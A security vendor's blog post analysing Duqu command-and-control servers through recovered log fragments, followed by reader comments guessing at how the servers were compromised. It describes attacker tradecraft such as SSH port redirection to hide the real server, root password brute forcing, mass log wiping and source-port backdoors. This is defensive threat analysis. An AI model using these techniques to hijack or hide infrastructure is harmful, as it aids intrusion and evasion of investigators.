English
The Internet threat alert status is currently normal. At present, no major epidemics or other serious incidents have been recorded by Kaspersky Lab’s monitoring service. Internet threat level: 1

The Mystery of Duqu: Part Six (The Command and Control servers)

VitalyK
Kaspersky Lab Expert
Posted November 30, 15:10  GMT
Tags: Targeted Attacks, Stuxnet, Zero-day vulnerabilities, Duqu
0.6
 

Over the past few weeks, we have been busy researching the Command and Control infrastructure used by Duqu.

It is now a well-known fact that the original Duqu samples were using a C&C server in India, located at an ISP called Webwerks. Since then, another Duqu C&C server has been discovered which was hosted on a server at Combell Group Nv, in Belgium.

At Kaspersky Lab we have currently cataloged and identified over 12 different Duqu variants. These connect to the C&C server in India, to the one in Belgium, but also to other C&C servers, notably two servers in Vietnam and one in the Netherlands. Besides these, many other servers were used as part of the infrastructure, some of them used as main C&C proxies while others were used by the attackers to jump around the world and make tracing more difficult. Overall, we estimate there have been more than a dozen Duqu command and control servers active during the past three years.

Before going any further, let us say that we still do not know who is behind Duqu and Stuxnet. Although we have analyzed some of the servers, the attackers have covered their tracks quite effectively. On 20 October 2011 a major cleanup operation of the Duqu network was initiated. The attackers wiped every single server they had used as far back as 2009 – in India, Vietnam, Germany, the UK and so on. Nevertheless, despite the massive cleanup, we can shed some light on how the C&C network worked.

Server ‘A’ – Vietnam

Server ‘A’ was located in Vietnam and was used to control certain Duqu variants found in Iran. This was a Linux server running CentOS 5.5. Actually, all the Duqu C&C servers we have found so far run CentOS – version 5.4, 5.5 or 5.2. It is not known if this is just a coincidence or if the attackers have an affinity (exploit?) for CentOS 5.x.

When we began analyzing the server image, we first noticed that at least the ‘root’ folder and the system log files folder ‘/var/log/’ had a ‘last modified’ timestamp of 2011-10-20 18:07:28 (UTC+3).

However, both folders were almost empty. Despite the modification date/time of the root folder, there were no files inside modified even close to this date. This indicates that certain operations (probably deletions / cleaning) took place on 20 October at around 18:07:28 GMT+3 (22:07:28 Hanoi time).

Interestingly, on Linux it is sometimes possible to recover deleted files; however, in this case we couldn’t find anything. No matter how hard we searched, the sectors where the files should have been located were empty and full of zeroes.

By bruteforce scanning the slack (unused) space in the ‘/’ partition, we were able to recover parts of the ‘sshd.log’ file. This was kind of unexpected and it is an excellent lesson about Linux and the ext3 file system internals; deleting a file doesn’t mean there are no traces or parts, sometimes from the past. The reason for this is that Linux constantly reallocates commonly used files to reduce fragmentation. Hence, it is possible to find parts of older versions of a certain file, even if they were thoroughly deleted.

As can be seen from the log above, the root user logged in twice from the same IP address on 19 July and 20 October. The latter login is quite close to the last modified timestamps on the root folder, which indicates this was the person responsible for the system cleanup – bingo!

So, what exactly was this server doing? We were unable to answer this question until we analyzed server ‘B’ (see below). However, we did find something really interesting. On 15 February 2011 openssh-5.8p1 (the sourcecode) was copied to the machine and subsequently installed. The distribution is “openssh_5.8p1-4ubuntu1.debian.tar.gz” with an MD5 of ‘86f5e1c23b4c4845f23b9b7b493fb53d’ (stock distribution). We can assume the machine has been running openssh-4.3p1 as included in the original distribution of CentOS 5.2. On 19 July 2011 OpenSSH 5.8p2 was copied to the system. It was compiled and binaries were installed into folders (/usr/local/sbin). The OpenSSH distribution was again the stock one.

The date of 19 July is important because it indicates when the new OpenSSH 5.8p2 was compiled in the system. Just after that, the attackers logged in, probably to check if everything was OK.

One good way of looking at the server is to check the file deletions and to put them into an activity graph. On days when there was notable operations going on, you see a spike:

For our particular server, several spikes immediately raise suspicions: 15 February and 19 July, when new versions of OpenSSH were installed; 20 October, when the server cleanup took place. Additionally, we found spikes on 10 February and 3 April, when certain events took place. We were able to identify “dovecot” crashes on these dates, although we can’t be sure they were caused by the attackers (“dovecot” remote exploit?) or simply instabilities.

Of course, for server ‘A’, three big questions remain:

  • How did the attackers get access to this computer in the first place?
  • What exactly was its purpose and how was it (ab-)used?
  • Why did the attackers replace the stock OpenSSH 4.3 with version 5.8?
We will answer some of these at the end.

Server ‘B’ – Germany

This server was located at a data center in Germany that belongs to a Bulgarian hosting company. It was used by the attackers to log in to the Vietnamese C&C. Evidence also seems to indicate it was used as a Duqu C&C in the distant past, although we couldn’t determine the exact Duqu variant which did so.

Just like the server in Vietnam, this one was thoroughly cleaned on 20 October 2011. The “root” folder and the “etc” folder have timestamps from this date, once again pointing to file deletions / modifications on this date. Immediately after cleaning up the server, the attackers rebooted it and logged in again to make sure all evidence and traces were erased.

Once again, by scanning the slack (unused) space in the ‘/’ partition, we were able to recover parts of the ‘sshd.log’ file. Here are the relevant entries:

First of all, about the date – 18 November. Unfortunately, “sshd.log” doesn’t contain the year. So, we can’t know for sure if this was 2010 or 2009 (we do know it was NOT 2011) from this information alone. We were, however, able to find another log file which indicates that the date was 2009:

What you can see above is a fragment of a “logwatch” entry which indicates the date of breach to be 23 November 2009, when the root user logged in from the IP address from 19 November, in the “sshd.log”. The other two messages are also important – they are errors from “sshd” indicating a port 80 and port 443 redirection was attempted; however, they were already busy. So now we know how these servers were used as C&C – port 80 and port 443 were redirected over sshd to the attackers’ server. These Duqu C&C were never used as true C&C – instead they were used as proxies to redirect traffic to the real C&C, whose location remains unknown. Here’s what the full picture looks like:

Answering the questions

So, how did these servers get hacked in the first place? One crazy theory points to a 0-day vulnerability in OpenSSH 4.3. Searching for “openssh 4.3 0-day” on Google finds some very interesting posts. One of them is (https://www.webhostingtalk.com/showthread.php?t=873301):

This post from user “jon-f”, which dates back to 2009, indicates a possible 0-day in OpenSSH 4.3 on CentOS; he even posted sniffed logs of the exploit in action, although they are encrypted and not easy to analyze.

Could this be the case here? Knowing the Duqu guys and their never-ending bag of 0-day exploits, does it mean they also have a Linux 0-day against OpenSSH 4.3? Unfortunately, we do not know.

If we look at the “sshd.log” from 18 November 2009, we can, however, get some interesting clues. The “root” user attempts to log in using a password multiple times from an IP in Singapore, until they finally succeed:

Note how the “root” user tries to login at 15:21:11, fails a couple of times and then 8 minutes and 42 seconds later the login succeeds. This is more of an indication of a password bruteforcing rather a 0-day. So the most likely answer is that the root password was bruteforced.

Nevertheless, the third question remains: Why did the attackers replace the stock OpenSSH 4.3 with version 5.8? On the server in Germany we were able to recover parts of the “.bash_history” file just after the server was hacked:

The relevant commands are “yum install openssh5”, then “yum update openssh-server”. There must be a good reason why the attackers are so concerned about updating OpenSSH 4.3 to version 5. Unfortunately, we do not know the answer to this question. On an interesting note, we observed that the attackers are not exactly familiar with the “iptables” command line syntax. Additionally, they are not very sure about the “sshd_config” file format either, so they needed to bring up the manual for it (“man sshd_config”) as well as for the standard Linux ftp client. What about the “sshd_config” file, the sshd configuration”? Once again, by searching the slack space we were able to identify what they were after. In particular, they changed the following two lines:

GSSAPIAuthentication yes
UseDNS no

While the second one is relevant for speed, especially when performing port direction over tunnels, the first one enables Kerberos authentication. We were able to determine that in other cases exactly the same modifications were applied.

Conclusion:

We have currently analyzed only a fraction of the available Duqu C&C servers. However, we were able to determine certain facts about how the infrastructure operated:

  1. The Duqu C&C servers operated as early as November 2009.
  2. Many different servers were hacked all around the world, in Vietnam, India, Germany, Singapore, Switzerland, the UK, the Netherlands, Belgium, South Korea to name but a few locations. Most of the hacked machines were running CentOS Linux. Both 32-bit and 64-bit machines were hacked.
  3. The servers appear to have been hacked by bruteforcing the root password. (We do not believe in the OpenSSH 4.3 0-day theory - that would be too scary!)
  4. The attackers have a burning desire to update OpenSSH 4.3 to version 5 as soon as they get control of a hacked server.
  5. A global cleanup operation took place on 20 October 2011. The attackers wiped every single server which was used even in the distant past, e.g. 2009. Unfortunately, the most interesting server, the C&C proxy in India, was cleaned only hours before the hosting company agreed to make an image. If the image had been made earlier, it’s possible that now we’d know a lot more about the inner workings of the network.
  6. The “real” Duqu mothership C&C server remains a mystery just like the attackers’ identities.

We would also like to send a question to Linux admins and OpenSSH experts worldwide – why would you update OpenSSH 4.3 to version 5.8 as soon as you hack a machine running version 4.3? What makes version 5.8 so special compared to 4.3? Is it related to the option “GSSAPIAuthentication yes” in the config file?

We hope that through cooperation and working together we can cast more light on this huge mystery of the Duqu Trojan.

Kaspersky Lab would like to thank the companies PA Vietnam, Nara Syst and the Bulgarian CyberCrime unit for their kind support in this investigation. This wouldn’t have been possible without their cooperation.

You can contact the Kaspersky Duqu research team at “stopduqu AT Kaspersky DOT com”.


46 comments

Newest first
Table view
 

lenhuhiep

2012 Dec 29, 12:08
0
 

Re: Re: About 0 day

http://www.online360.vn/noi-that-van-phong.html

and

http://www.online360.vn/noi-that-tre-em.html

Reply    

ivan

2012 Mar 16, 21:56
0
 

Re: Kerberos OpenSSH

I wouldn't underestimate the OpenSSH+Kerberos bug theory. Let's see...
1. CentOS is known to lag behind RHEL in terms of rolling out patches, read this article dated Feb. 23, 2011 concerning CentOS <5.6 http://lwn.net/Articles/429364/.
2. On Feb 8. 2011 RedHat issued several patches including one for Kerberos (krb5). It is reasonable to think that attackers saw those patches and knew fixes were not available for CentOS 5 servers which gave anyone a window of a couple of weeks to develop an exploit
http://lwn.net/Alerts/427122/
3. OpenSSH 4.3 allowed the unauthenticated client to pass embedded \0 characters in strings , this was fixed on August 31, 2010 and rolled out in OpenSSH 4.9
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/packet.c
4. These embedded \0 characters could have been passed on to kerb5 by OpenSSH's GSS API support, see:
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/gss-serv-krb5.c

5. Patches for dovecot vulnerabilities were published on Feb 7, 2011 which may explain the crashes.
http://seclists.org/fulldisclosure/2011/Feb/116

So it may be possible that attackers where using a OpenSSH+kerb5 bug all along and rushed to close the attack vectors when they became publicly known

Reply    

Darrin Ward

2012 Mar 14, 09:12
0
 

I am so utterly fascinated by all of this. I am no *nix admin but I do play around with the command line a lot to get some work done... I compile some source code and hack things, but nothing major. I spend the vast majority of my time in the command line with Apache and php.

I total agree about the uname -a and cat /etc/issue... When I saw that I was thinking "they don't know what system they're on".

I wonder if the port 80 and 443 issue has been fully investigated. I mean, obviously they're the standard HTTP and HTTPS ports, but I would expect most machines to already be running servers on those ports (as you see they ran into this by getting the binding errors - the ports were already in use). And you couldn't just disable the existing servers because then obviously the box owners would know that the Web services are down, giving them away.

So you'd have 2 choices: First option would be to use ports other than 80 and 443. Of course, then you would have to make sure those ports were open through firewalls (we can see they already worked with iptables), and traffic to a non-standard port would be suspicious anyway (although, even if servers weren't being run on 80 and 443, traffic to those ports would be suspicious!) ...

OR, second option, you could configure the existing server(s) operating on those ports to do the proxying of requests to other servers for you. That way you can leave the existing Web server(s) serving the anticipated content, but maybe set up a vhost for something else which is proxied. Apache httpd and most other obviously can do this. So, I'm wondering if the httpd.conf files or other config files for Web servers were checking for anything suspicious?

Reply    

Hilbert Space

2012 Mar 10, 20:59
0
 

Re: the intelligence of those responsible

"iptables -F"

... All iptables chains are deleted
... This is stupid and only applicable to vanilla systems; if the iptables have forwarding rules and rewrites or a default DROP policy, downtime and customer anger WILL alert the sysop.
Not to mention that your current SSH connection's packets might well go to the bit bucket. End of story.

"uname -a"
"cat /etc/issue"

... These guys don't know what system this is!

"yum install openssh5" ("No such package")
"up2date" ("Command not found")
"yum search" ("What was that package name again?")

Not sure whether this is not a uni freshman who begged long and hard for a root password in chatrooms.

Edited by Hilbert Space, 2012 Mar 10, 21:31

Reply    

sansimon

2012 Mar 10, 07:38
0
 

the intelligence of those responsible

I found it very strange use of "nano" and etc. ..
I believe that whoever carried out the cleaning and the updates were people follow a how-to, like a soldier of an army on a mission.

Reply    

Digital Human

2012 Mar 09, 13:04
0
 

Idea's

I do agree with the fact brute forcing is unlikely. About the netcat thing. I used it once to execute commands from a remote host. Explains the fast whype. With a simpel bash script its more then enough to keep a door open.
My other idea about the: yum update openssh5, what if they just use they're own repo and redirected the dns. Why else did they disable DNS in ssh_config? Only for speed?
1 rule with hacking: DONT HURRY it's just to cover-up DNS requests.

Reply    

Digital Human

2012 Mar 09, 13:00
0
 

Re: Lord..

I do agree with you. Brute forcing is unlikely. About the netcat thing. I used it once to execute commands from a remote host. With a simpel bash script its more then enough to keep a door open.
My other idea about the: yum update openssh5, what if they just use they're own repo and redirected the dns. Why else did they disable DNS in ssh_config? Only for speed? 1 rule with hacking: DONT HURRY

Reply    

nomadlogic

2012 Mar 08, 01:55
0
 

why openssh_5.8p1-4ubuntu1.debian.tar.gz?

one question i have not seen asked yet is why is this person(s) using an ubuntu patched version of openssh on a CentOS box.

some possibilities:
- there is an exploit in this version of openssh that the ubuntu folks are shipping, and the people behind this are utilizing it on these CentOS boxes.

*or*

- as mentioned earlier, there are junior people doing the actual logging in and hacking on these systems. they are probably working off less than clear instructions or documentation, don't have much *nix foo and are probably working on a lousy internet cafe connection.

i'm kinda leaning towards the second possibility based on the huge difference in quality of the code that has been written and how clumsy deploying the backdoor is. aside from the choice of editors, lack of knowledge in how iptables et. al. work - a seasoned attacker would not rely on compilers being available on a target system to build an apparently required binary (in this case openssh-5.x).

having said that - the first possibility *is* interesting :)

Reply    

DavidGrimes

2012 Jan 03, 01:13
0
 

the intelligence of those responsible

the only possible explanation for the occurence -help and man is part smoke and mirrors and mind-games.
should an admin or someone interupt the attacker while he's doing his work it would be easy for most and apparently a great majority to discount the intelligence or significance. For instance observing this both real-time (thru binoculars or MiTM) it could seem amateurish as well as post-partem a coincedental power-outage, HW failure, or other external something - interuppted the compromise leaving it unclean.. admin discovers through a simple #history that some newb script-kiddie with no clue how to use iptables yadda yadda...
admin wouldnt be calling the law because someone made his box a c c server..

Reply    

VonSatan

2012 Jan 02, 23:02
0
 

Re: Ops vs. Developers

If that's the case, then there's not such a thing like a "server hack".
What we are looking at is just a noob server op trying to do his work and these C C servers belong to the attackers.
If you have a big operation going on, you won't risk it by using noob people as server ops.

Reply    

VonSatan

2012 Jan 02, 22:38
0
 

Re: Not buying this

100% agree.
Only a noob with no clue in how to use linux could be using commands with "--help" switch... I mean "iptables --help"??? come on man wtf??
Also, these failed logging attempts looks more like another noob mistake like having caps lock enabled, rather than a "brute force" method.

Reply    

Mat

2011 Dec 30, 12:58
0
 

Ops vs. Developers

Based on the logs it seems clear that the people using the C C servers are not very Linux savvy. There are two possibilities:

1) The duqu / stuxnet developers are experts about windows but don't know Linux very well. Possible but unlikely.

2) The people who "use" duqu / stexnet are different from the people who wrote them. Which would be classic operational security practiced by countries the world over. Basically, you tell the developers as little as possible about the target or the time frame for using the tool. You then have a separate ops team the knows the target and time frame, but has limit knowledge of how the software works.

If you assume that duqu / stuxnet is government sponsored then you have "government quality" individuals on the ops team and world class developers writing the tools. Which would explain the behavior seen in the logs.

Reply    

sameer-shelavale

2011 Dec 22, 05:56
0
 

What makes version 5.8 so special?

There is nothing special about 5.8 actually.
The special i believe is in version 5.6.

this version allows ssh connection multiplexing and supports remote forwarding with dynamic port allocation it can report the allocated port back.

The Connection multiplexing allows a lot faster connection while using proxied SSH.
The remote connection forwarding can be used to bypass restrictive firewalls ;)

From my point of view,

1. During the duqu updates, the attacker logged in manually just for updating OpenSSL. Maybe the duqu itself had no provision to run shell commands?(this sounds quiet unrealistic, but may be a case with unknown reason)

2. With updated version of OpenSSL, the attacker might have tried to made the communication of the Ququ servers more secure and fast and probably it avoided risk of the control takeover by defending parties.

3. with new method Ququ may leave back less traces and may become harder to analyze.

Also, I am sure you have not posted much data over here or you have posted most irrelevant data which may not alert the attackers. :D

Reply    

vegeances

2011 Dec 07, 20:01
0
 

dear friend,

The updating the OpenSSH 4.3 to version 5.8 as soon as they hack a machine running version 4.3

"they updating it become...the new update because...the update will be need to unistall the old file to make sure the new update is working...properly in the machine..In this case ...it make's the attacker easier to clean all the trace....that had been made.....so it is clear...about the update...as you can see...the older version...had been hack...so the information are still in it...that's why the attacker updating..it.../
to make sure that the information will be not fall in your hand...
Otherwise, it is easier to find out..where the source come from....

Thank You.....(Vegeances) p/s : I'm volunteer myself to help you guy....(age : 16) I just find the solution after I read this...
(I hope I can be like...you guyz..) (future) aha

Reply    

Costin Raiu

2011 Dec 05, 16:39
0
 

Re: Lord..

Hi there,

" default centos distribution disables remote root login by default.."

Sorry to say, but you are wrong - default CentOS installs allow remote root logins. See above for the comment from one of the CentOS devs who recommends disabling remote root login and restricting access to trusted IPs only.

Reply    

shitonme

2011 Dec 03, 05:04
-1
 

Lord..

they did not use their own yum repo, nor did they bruteforce any 'root' password, default centos distribution disables remote root login by default.. it's pretty damned obvious that none of the people commenting on this have any clue about hacking.

Reply    

shitonme

2011 Dec 03, 05:00
0
 

Re:

On your 2nd point, re: netstat;

I'm guessing that the backdoor they're using is one for OpenSSH where you have to connect from a certain source port (1234) or some other service that is backdoored and drops you to a root shell if you connect from the correct source port. Backdoors have operated like this for years, it's a lot less inconspicuous for a backdoored daemon to act this way than instead of listening on a port that is not typically occupied by any of the normal or generic services. Think about it, you don't want your backdoor showing up in the IT guys nessus logs do you?

Reply    

ripratm

2011 Dec 01, 21:18
0
 

Re: Not buying this

I agree partially. I tend to lean to some form of exploit vs brute force (whether thats exploit is on ssh or something else). But 4 failed attempts doesn't scream brute force, but crappy typer or they just didn't have the right password. The box was probably previously compromised and someone gave them the password, they tried to login with the wrong info, and had to go find the password (email, chat, irc, etc) then was able to login correctly.

I agree about the "if they are smart enough to write the worm, they probably should know their way around a unix box better". I'm guessing this particular person logging in it probably some lackey in the group vs the high level hacker that compromised the box (going back to my first paragraph).

Not to mention, isn't Root turned off on default on almost all ssh installations (regardless of distro or OS). It was probably previously hacked and then enabled.

Reply    

Johnny Hughes

2011 Dec 01, 15:55
0
 

Re: Not buying this

There are no known dovecot exploits that allow remote access on CentOS. There is an exim exploit that would allow remote access and one krb5 issue that could allow remote execution of code ... and that could then give them access.

See my comments below for the exploit links.

You would need to do some research before just wildly deciding that "they got in via dovecot".

Also remember that the sources used to build CentOS contain backported code for security issues, so it is NOT just openssh-4.3p2 ... it has patches for all known security issues.

Backporting: (https://access.redhat.com/security/updates/backporting/)

Security Updates: (http://rhn.redhat.com/errata/rhel-server-errata-security.html)

Reply    

Johnny Hughes

2011 Dec 01, 15:30
0
 

exim is a possible entry point on machines without an update

I am one of the CentOS Devs.

There is an Critical issue with exim that Red Hat published a fix for on 2010-DEC-10 (http://rhn.redhat.com/errata/RHSA-2010-0970.html). CentOS released our version of that fix on 11-Dec-2010 19:59 for CentOS-5. You can see it in the Vault here (http://vault.centos.org/5.5/updates/SRPMS/).

Other than that and some samba issues (hopefully nobody is exposing samba directly to the internet without a Firewall :D), and some web browser issues, there are not may issues that a 5.2 (or higher) server would have. There is one possible krb5 issue too (http://rhn.redhat.com/errata/RHSA-2010-0029.html) ... but that one is not likely.

They most likely used some kind of brute force method to find the root login. People should disable root logins for ssh directly and require users to "su" to root if required and they also should control their ssh connections with keys (and disable passwords altogether) and/or limit access to external ssh ports from only IPs (or networks) that require access.

Reply    

M F

2011 Dec 01, 14:59
0
 

Re: Re:

these commands and iptables flushing indicates setup for reverse shell, reverse backdoor or something.
maybe it was for their tunnelings

Reply    

antus

2011 Dec 01, 12:17
0
 

up2date: to me this implys they have a big budget and are used to running RHEL probably in their own labs and ran it out of habit.

openssh5: perhaps they edited the dns resolution or somehow manipulated the dns traffic at the IP level to point the default yum repos to their own, and that does have a backdoored openssh5 package in it. They may hope that the name 'openssh5' sets off less alarm bells in peoples heads than 'openssh-backdoored'. I suspect this is also why they compiled their own openssh on the other system. Backdoored. While they may very well be using kerberos, the backdoor may be switchable with that option. Any fragments of /var/log/yum.log available?

availability: I'd love to have a look over one of these images too.

Reply    

Sam Crawford

2011 Dec 01, 02:30
0
 

Re: Re: Re: Kerberos OpenSSH

I did the same as _dvorak_ earlier and had a dig through all of the intermediate versions :)

The DoS issue didn't seem to allow unauthorised access - just denial of service. I did wonder earlier if 8 minute pause between SSH logins earlier was used to change the root password via some unknown exploit, which then allowed them to SSH in (and potentially restore the old root password, so as to avoid detection).

There were also quite a few Kerberos related fixes/changes (disabling SPNEGO, checking extra paths for krb5-config, etc), but none struck me as a major feature.

I'm also leaning towards the agent forwarding feature that Jesse and Costin mentioned earlier. It'd be interesting to work out if that could be related to the Kerberos auth being enabled - I cannot see a relation there at the moment.

Reply    

Sam Crawford

2011 Dec 01, 02:17
0
 

Re: Re: Re: Re: Kerberos OpenSSH

Jesse - I wasn't disagreeing with you, I was disagreeing (only in a minor way) with Costin's description of the -W option.

Anyway, I doubt the -W option was the driver for installing the newer SSH server, given (a) the fact it's a client side option, (b) is netcat-like, but not actually netcat (using -L/-R with netcat on one side would give you more flexibility, as -W purely uses stdin and stdout)

Really interesting topic! Imagine what we'd do if we had access to all of the logs :-)

Reply    

Jesse Carter

2011 Dec 01, 02:17
0
 

Re: Re: Re: Re: Strangely named files

To my knowledge you have to compile TGT in explicitly, which I didn't see in the logs. Feel free to correct me if I'm wrong. But I'd have to agree that kerb is in use for a reason. I guess I know what I'm reading up on tonight. :)

Reply    

chort

2011 Dec 01, 02:07
0
 

Re: Re: Re: Re: Strangely named files

Whoops, good point. I saw .ssh in the path for the first and assumed the rest since it conveniently (almost) fit.

Reply    

Jesse Carter

2011 Dec 01, 02:06
0
 

Re: Re: Re: Kerberos OpenSSH

Sam,

Helpful notes. I don't disagree that they can replicate *most* of what netcat can do using existing techniques.

My point was that it makes lots of things much simpler over tunneled services.
Additionally netcat has the potential to open up a couple of security loopholes when trying to compromise a host remotely (as stated in the article you referenced).

Nice catch on known_hosts by the way. You beat me to it. :)

Reply    

Sam Crawford

2011 Dec 01, 02:05
0
 

Re: Re: Re: Strangely named files

Kerb auth or kerb auth forwarding? I've just been reading the docs on the latter, wondering if the agent forwarding feature that Jesse mentioned could be related to Kerberos auth being enabled. I don't think it is - you need TGT forwarding enabled to forward Kerberos auth, but there could be some combination or external configuration I'm overlooking.

Looking at Costin's post, I don't believe there was a .ssh/config - the only file under .ssh/ was 00000000000, which I'm in agreement is almost certainly known_hosts. Given that they were (relatively) careful, I'd be surprised if they created a .ssh/config file, when they could just pass everything to ssh via -o options.

Reply    

Jesse Carter

2011 Dec 01, 01:56
0
 

Re: Re: Kerberos OpenSSH

Costin,

No problem, glad to help. Stinks about the KDC. I may be mistake, but I'm under the impression that some implementations of Kerberos implement the KDC using properties instead of a .conf file. I'm not 100% sure whether or not OpenSSH has that option.

Regarding the deleted file names, I'm definitely in agreement with chort and Sam on that:

0 = .
00 = ..
000000 = config
00000000000 = known_hosts

Reply    

chort

2011 Dec 01, 01:55
0
 

Re: Re: Kerberos OpenSSH

It has been suggested (http://twitter.com/#!/_dvorak_/status/141981510914949120) that the changelog for OpenSSH 4.4 might provide clues (http://www.openssh.org/txt/release-4.4).

One of the changes was a pre-auth DoS found by Mark Dowd that could possibly allow RCE on the portable (non-OpenBSD) version if GSSAPIAuthentication was enabled (I believe it is by default). Since it involves a race condition, perhaps the repeated login failures were not password brute-forcing, but rather it took several attempts to win the race.

Reply    

If you would like to comment on this article you must first
login


Bookmark and Share
Share

Analysis

Blog